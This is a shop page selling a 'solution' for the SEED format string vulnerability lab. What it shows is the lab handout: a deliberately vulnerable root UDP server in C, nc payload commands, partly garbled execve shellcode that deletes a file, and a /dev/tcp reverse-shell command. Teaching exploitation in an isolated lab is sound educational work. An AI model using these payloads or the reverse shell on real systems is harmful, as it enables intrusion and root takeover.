Format String Vulnerability Lab solution

$30.00 $24.00

• Lab Overview The printf() function in C is used to print out a string according to a format. Its first argument is called format string, which defines how the string should be formatted. Format strings use placeholders marked by the % character for the prinf() function to fill in data during the printing. The…

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• Lab Overview

The printf() function in C is used to print out a string according to a format. Its first argument is called format string, which defines how the string should be formatted. Format strings use placeholders marked by the % character for the prinf() function to fill in data during the printing. The use of format strings is not only limited to the printf() function; many other functions, such as sprintf(), fprintf(), and scanf(), also use format strings. Some programs allow users to provide the entire or part of the contents in a format string. If such contents are not sanitized, malicious users can use this opportunity to get the program to run arbitrary code. A problem like this is called format string vulnerability.

The objective of this lab is for students to gain the first-hand experience on format-string vulnerability by putting what they have learned about the vulnerability from class into actions. Students will be given a program with a format-string vulnerability; their task is to exploit the vulnerability to achieve the following damage: (1) crash the program, (2) read the internal memory of the program, (3) modify the internal mem-ory of the program, and most severely, (4) inject and execute malicious code using the victim program’s privilege. The last consequence is very dangerous if the vulnerable program is a privileged program, such as a root daemon, because that can give attackers the root access of the system. This lab covers the following topics:

• Format string vulnerability

• Code injection

• Shellcode

• Reverse shell

Readings and related topics. Detailed coverage of the format string attack can be found in Chapter 6 of the SEED book, Computer Security: A Hands-on Approach, by Wenliang Du.

Lab environment. This lab has been tested on our pre-built Ubuntu 16.04 VM, which can be downloaded from the SEED website.

• Lab Tasks

To simplify the tasks in this lab, we turn off the address randomization using the following command:

$ sudo sysctl -w kernel.randomize_va_space=0

SEED Labs – Format String Vulnerability Lab

2.1 Task 1: The Vulnerable Program

You are given a vulnerable program that has a format string vulnerability. This program is a server program. When it runs, it listens to UDP port 9090. Whenever a UDP packet comes to this port, the program gets the data and invokes myprint() to print out the data. The server is a root daemon, i.e., it runs with the root privilege. Inside the myprintf() function, there is a format string vulnerability. We will exploit this vulnerability to gain the root privilege.

Listing 1: ”The vulnerable server program”

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

#include <string.h>

#include <sys/socket.h>

#include <netinet/ip.h>

#define PORT 9090

char *secret = “A secret message\n”;
unsigned int target = 0x11223344;

void myprintf(char *msg)

printf(“The address of the ’msg’ argument: 0x%.8x\n”, (unsigned) &msg);

• This line has a format-string vulnerability printf(msg);

printf(“The value of the ’target’ variable (after): 0x%.8x\n”, target);


• This function provides some helpful information. It is meant to

• simplify the lab task. In practice, attackers need to figure

• out the information by themselves.

void helper()


printf(“The address of the secret: 0x%.8x\n”, (unsigned) secret);

printf(“The address of the ’target’ variable: 0x%.8x\n”, (unsigned) &target);

printf(“The value of the ’target’ variable (before): 0x%.8x\n”, target);


void main()


struct sockaddr_in server;

struct sockaddr_in client;

int clientLen;

char buf[1500];


int sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); memset((char *) &server, 0, sizeof(server)); server.sin_family = AF_INET;
SEED Labs – Format String Vulnerability Lab


server.sin_addr.s_addr = htonl(INADDR_ANY); server.sin_port = htons(PORT);

if (bind(sock, (struct sockaddr *) &server, sizeof(server)) < 0) perror(“ERROR on binding”);

while (1) {

bzero(buf, 1500);

recvfrom(sock, buf, 1500-1, 0,
(struct sockaddr *) &client, &clientLen); myprintf(buf);




Compilation. Compile the above program. You will receive a warning message. This warning message is a countermeasure implemented by the gcc compiler against format-string vulnerabilities. We can ignore this warning message for now.

• gcc -z execstack -o server server.c server.c: In function myprintf:

server.c:13:5: warning: format not a string literal and no format arguments




It should be noted that the program needs to be compiled using the “-z execstack” option, which allows the stack to be executable. This option has no impact on Tasks 1 to 5, but for Tasks 6 and 7, it is important. In these two tasks, we need to inject malicious code into this server program’s stack space; if the stack is not executable, Tasks 6 and 7 will fail. Non-executable stack is a countermeasure against stack-based code injection attacks, but it can be defeated using the return-to-libc technique. To simplify this lab, we simply disable this defeat-able countermeasure.

Running and testing the server. The ideal setup for this lab is to run the server on one VM, and then launch the attack from another VM. However, it is acceptable if students use one VM for this lab. On the server VM, we run our server program using the root privilege. We assume that this program is a privileged root daemon. The server listens to port 9090. On the client VM, we can connect to the server using the nc command, where the flag “-u” means UDP (the server program is a UDP server). The IP address in the following example should be replaced by the actual IP address of the server VM, or if the client and server run on the same VM.

• On the server VM $ sudo ./server

• On the client VM $ nc -u 9090 message typed by you

Yon can type any message on the client side; the server program is supposed to print out whatever is typed by you. However, a format string vulnerability exists in the server program’s myprintf() function,

SEED Labs – Format String Vulnerability Lab

which allows us to get the server program to do more than what it is supposed to do, including giving us a root access to the server machine. In the rest of this lab, we are going to exploit this vulnerability.

2.2 Task 2: Understanding the Layout of the Stack







myprintf() 2










Return Address


format string

Return Address


Higher Address


Input provided by remote users

will be stored here.







Lower Address


Figure 1: The stack layout when printf() is invoked from inside of the myprintf() function.

To succeed in this lab, it is essential to understand the stack layout when the printf() function is invoked inside myprintf(). Figure 1 depicts the stack layout. You need to conduct some investigation and calculation, and then answer the following questions:

• Question 1: What are the memory addresses at the locations marked by ˚, ¸, and Ì?

• Question 2: What is the distance between the locations marked by ˚ and Ì?

2.3 Task 3: Crash the Program

The objective of this task is to provide an input to the server, such that when the server program tries to print out the user input in the myprintf() function, it will crash.

2.4 Task 4: Print Out the Server Program’s Memory

The objective of this task is to get the server to print out some data from its memory. The data will be printed out on the server side, so the attacker cannot see it. Therefore, this is not a meaningful attack, but the technique used in this task will be essential for the subsequent tasks.

• Task 4.A: Stack Data. The goal is to print out the data on the stack (any data is fine). How many format specifiers do you need to provide so you can get the server program to print out the first four bytes of your input?

SEED Labs – Format String Vulnerability Lab

• Task 4.B: Heap Data There is a secret message stored in the heap area, and you know its address; your job is to print out the content of the secret message. To achieve this goal, you need to place the address (in the binary form) of the secret message in your input (i.e., the format string), but it is difficult to type the binary data inside a terminal. We can use the following commands do that.

$ echo $(printf “\x04\xF3\xFF\xBF”)%.8x%.8x | nc 9090

// Or we can save the data in a file

• echo $(printf “\x04\xF3\xFF\xBF”)%.8x%.8x > input

• nc 9090 < input

It should be noted that most computers are small-endian machines, so to store an address 0xAABBCCDD (four bytes on a 32-bit machine) in memory, the least significant byte 0xDD is stored in the lower ad-dress, while the most significant byte 0xAA is stored in the higher address. Therefore, when we store the address in a buffer, we need to save it using this order: 0xDD, 0xCC, 0xBB, and then 0xAA.

2.5 Task 5: Change the Server Program’s Memory

The objective of this task is to modify the value of the target variable that is defined in the server program. Its original value is 0x11223344. Assume that this variable holds an important value, which can affect the control flow of the program. If remote attackers can change its value, they can change the behavior of this program. We have three sub-tasks.

• Task 5.A: Change the value to a different value. In this sub-task, we need to change the content of the target variable to something else. Your task is considered as a success if you can change it to a different value, regardless of what value it may be.

• Task 5.B: Change the value to 0x500. In this sub-task, we need to change to the content of the target variable to a specific value 0x500. Your task is considered as a success only if the variable’s value becomes 0x500.

• Task 5.C: Change the value to 0xFF990000. This sub-task is similar to the previous one, except that the target value is now a large number. In a format string attack, this value is the total number of characters that are printed out by the printf() function; printing out this large number of characters may take hours. You need to use a faster approach. The basic idea is to use %hn, instead of %n, so we can modify a two-byte memory space, instead of four bytes. Printing out 216 characters does not take much time. We can break the memory space of the target variable into two blocks of memory, each having two bytes. We just need to set one block to 0xFF99 and set the other one to 0x0000. This means that in your attack, you need to provide two addresses in the format string.

In format string attacks, changing the content of a memory space to a very small value is quite chal-lenging (please explain why in the report); 0x00 is an extreme case. To achieve this goal, we need to use an overflow technique. The basic idea is that when we make a number larger than what the storage allows, only the lower part of the number will be stored (basically, there is an integer overflow). For example, if the number 216 + 5 is stored in a 16-bit memory space, only 5 will be stored. Therefore, to get to zero, we just need to get the number to 216 = 65; 536.

2.6 Task 6: Inject Malicious Code into the Server Program

Now we are ready to go after the crown jewel of this attack, i.e., to inject a piece of malicious code to the server program, so we can delete a file from the server. This task will lay the ground work for our next task,

SEED Labs – Format String Vulnerability Lab

which is to gain the complete control of the server computer.

To do this task, we need to inject a piece of malicious code, in its binary format, into the server’s memory, and then use the format string vulnerability to modify the return address field of a function, so when the function returns, it jumps to our injected code. To delete a file, we want the malicious code to execute the /bin/rm command using a shell program, such as /bin/bash. This type of code is called shellcode.

/bin/bash -c “/bin/rm /tmp/myfile”

We need to execute the above shellcode command using the execve() system call, which means we we need to feed the following arguments to execve():

execve(address to the “/bin/bash” string, address to argv[], 0), where argv[0] = address to the “/bin/bash” string,

argv[1] = address to the “-c” string,

argv[2] = address to the “/bin/rm /tmp/myfile” string, argv[3] = 0

We need to write the machine code to invoke the execve() system call, which means we need to set the following four registers and then invoke the int 0x80 instruction.

eax = 0x0B (execve()’s system call number)

ebx = address to the “/bin/bash” string (argument 1)

ecx = address to argv[] (argument 2)

edx = 0 (argument 3, for environment variables; we set it to NULL)

Setting these four registers in a shellcode is quite challenging, mostly because we cannot have any zero in the code (zero in string terminates the string). We provide the shellcode in the following. Detailed explanation of shellcode can be found in the Buffer-Overflow Lab and in Chapter 4.6 of the SEED book.

Listing 2: Shellcode (/bin/bash -c “/bin/rm /tmp/myfile”)

// Push “/bin////bash” into

// xorl %eax,
: eax = 0
// pushl

: 0 marks the end of a string
// pushl

// pushl
: “////” is equivalent to “/”


// pushl

// movl %esp,
: Save the string address to ebx
// Push “-ccc” into stack.


// xorl %eax,
” eax = 0
// pushl

: 0 marks the end of a string


// pushl
: “-ccc” is equivalent to “-c”
// movl %esp,
: Save the string address to eax
// Push “/bin/rm /tmp/myfile ” into stack.
// xorl %edx,
: edx = 0
// pushl

: 0 marks the end of a string



“\x68″”ile ”
// pushl

// pushl

// pushl

“\x68″”/rm ”
// pushl

// pushl



SEED Labs – Format String Vulnerability Lab



// movl
: Save the string address to edx


// Construct the argv[] array.

// xorl
%ecx, %ecx

// pushl %ecx
: argv[3]
= 0
// pushl %edx
: argv[2]
= address of “/bin/rm …”
// pushl %eax
: argv[1]
= address of “-c”
// pushl %ebx
: argv[0]
= address of “/bin/bash”


// movl
%esp, %ecx
: Save argv[]’s address to ecx
// Set edx to 0.


// xorl
%edx, %edx
: Let edx
= 0
// Invoke the system call.




// xorl
%eax, %eax

// movb
$0x0b, %al
: 0x0b is
execve()’s number
// int 0x80
: Invoke the execve() system call



You need to pay attention to the code between Lines À and `. This is where we push the /bin/rm command string into the buffer. In this task, you do not need to modify this part, but for the next task, you do need to modify it. The pushl instruction can only push a 32-bit integer into the stack; that is why we break the string into several 4-byte blocks. Since this is a shell command, adding additional spaces do not change the meaning of the command; therefore, if the length of the string cannot be divided by four, you can always add additional spaces. The stack grows from high address to low address (i.e., reversely), so we need to push the string also reversely into the stack.

In the shellcode, when we store “/bin/bash” into the stack, we store “/bin////bash”, which has a length 12, a multiple of 4. The additional “/” are ignored by execve(). Similarly, when we store “-c” into the stack, we store “-ccc”, increasing the length to 4. For bash, those additional c’s are considered as redundant.
The code shown above is for a C program, where we store the machine code into an array. For this task, we can directly type the binary code into our command (using nx) like the following (there is no need to type the quotations between instructions). It should be noted that we can put NOP (n0x90) at the beginning of our shellcode to make our life easier (why? Please explain it in your report).

• echo …(your format string)…$(printf “\x90\x90\x90\x90\x31\xc0 …

\x31\xd2\x52\68ile \x68/myf\x68/tmp\x68/rm \x68/bin\x89\xe2 … \xcd\x80”)

Please construct your input, feed it to the server program, and demonstrate that you can successfully remove the target file. In your lab report, you need to explain how your format string is constructed. Please mark on Figure 1 where your malicious code is stored (please provide the concrete address).

2.7 Task 7: Getting a Reverse Shell

When attackers are able to inject a command to the victim’s machine using TCP session hijacking, they are not interested in running one simple command on the victim machine; they are interested in running many commands. What attackers want to achieve is to use the attack to set up a back door, so they can use this back door to conveniently conduct further damages.
A typical way to set up back doors is to run a reverse shell from the victim machine to give the attacker the shell access to the victim machine. Reverse shell is a shell process running on a remote machine, connecting back to the attacker’s machine. This gives an attacker a convenient way to access a remote machine once it has been compromised. Explanation on how a reverse shell works is provided in Chapter 3
SEED Labs – Format String Vulnerability Lab

of the SEED book. It can also be found in the Guideline section of the Shellshock attack lab and the TCP attack lab.
To get a reverse shell, we need to first run a TCP server on the attacker machine. This server waits for our malicious code to call back from the victim server machine. The following nc command creates a TCP server listening to port 7070:

$ nc -l 7070 -v

You need to modify the shellcode listed in Listing 2, so instead of running the /bin/rm command using bash, your shellcode runs the following command. The example assumes that the attacker machine’s IP address is, so you need to change the IP address in your code:

/bin/bash -c “/bin/bash -i > /dev/tcp/ 0<&1 2>&1”

You only need to modify the code between Lines À and `, so the above “/bin/bash -i …” command is executed by the shellcode, instead of the /bin/rm command. Once you finish the shellcode, you should construct your format string, send it over to the victim server as an input. If your attack is successful, your TCP server should get a callback, and you will get a root shell on the victim machine. Please provide the evidence of success in your report (including screenshots).

2.8 Task 8: Fixing the Problem

Remember the warning message generated by the gcc compiler? Please explain what it means. Please fix the vulnerability in the server program, and recompile it. Does the compiler warning go away? Do your attacks still work? You only need to try one of your attacks to see whether it still works or not.

• Submission

You need to submit a detailed lab report, with screenshots, to describe what you have done and what you have observed. You also need to provide explanation to the observations that are interesting or surprising. Please also list the important code snippets (if any) followed by explanation. Simply attaching code without any explanation will not receive credits.

Format String Vulnerability Lab solution
$30.00 $24.00